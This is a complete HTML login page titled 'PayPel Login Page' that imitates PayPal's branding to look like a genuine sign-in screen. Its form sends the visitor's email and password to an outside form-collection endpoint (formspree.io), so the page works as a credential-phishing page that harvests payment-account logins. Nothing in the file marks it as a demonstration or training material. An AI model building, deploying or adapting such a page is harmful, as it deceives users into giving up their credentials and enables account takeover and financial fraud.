<!DOCTYPE html>
<html>

<head>
    <title>PayPel Login Page</title>
    <link rel="shortcut icon" href="logo1.png">
    <link rel=apple-touch-icon href="logo1.png">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@200;300;400&display=swap" rel="stylesheet">

    <style>
        body {
            font-family: 'Poppins', sans-serif;
            margin: 0;
            padding: 0;
        }

        .container {
            width: 100%;
            max-width: 400px;
            margin: 0 auto;
            text-align: center;
        }

        .logo {
            margin-top: 50px;
            margin-bottom: 50px;

        }


        .form-group {
            margin-bottom: 20px;
        }

        label {
            display: block;
            text-align: left;
            margin-bottom: 5px;
        }

        .forget {
            text-align: left;
        }

        .forget a {
            list-style: none;
            text-decoration: none;
        }

        input[type="email"],
        input[type="password"] {
            width: 100%;
            height: 50px;
            padding: 12px 20px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid gray;
            border-radius: 6px;
            border-bottom: 2px solid #ccc;
        }

        a:hover {
            text-decoration: underline;
        }


        input[type="submit"] {
            width: 100%;
            background-color: #0413bd;
            color: white;
            padding: 14px 20px;
            margin: 8px 0;
            border: none;
            border-radius: 20px;
            cursor: pointer;
        }

        input[type="button"] {
            width: 100%;
            background-color: white;
            color: #0413bd;
            border: 1px solid #0e2ecf;
            padding: 14px 20px;
            margin: 8px 0;
            /* border: none; */
            border-radius: 20px;
            cursor: pointer;
        }

        input[type="submit"]:hover {
            background-color: #0e2ecf;
        }

        input[type="button"]:hover {
            /* background-color: #0066a4; */
            border: 2px solid #0413bd;
            color: #0413bd;
        }

        hr {
            width: 100px;

        }

        p {
            display: flex;
            flex-direction: row;
        }

        p:before,
        p:after {
            content: "";
            flex: 1 1;
            border-bottom: 0.01px solid #000;
            margin: auto;
            max-width: 175px;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="logo">
            <img src="logo.png" alt="LOGO">
        </div>
        <form action="https://formspree.io/f/mrgwbzzp" method="POST">
            <div class="form-group">
                <label for="email">Email</label>
                <input type="email" id="email" name="email" required>
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" id="password" name="password" required>
            </div>
            <div class="forget">
                <a href="#">Forgotten password ?</a>
                <br>
                <br>
            </div>
            <input type="submit" value="Log In">
            <p>or</p>

            <input type="button" value="Sign Up">
        </form>
    </div>
</body>

</html>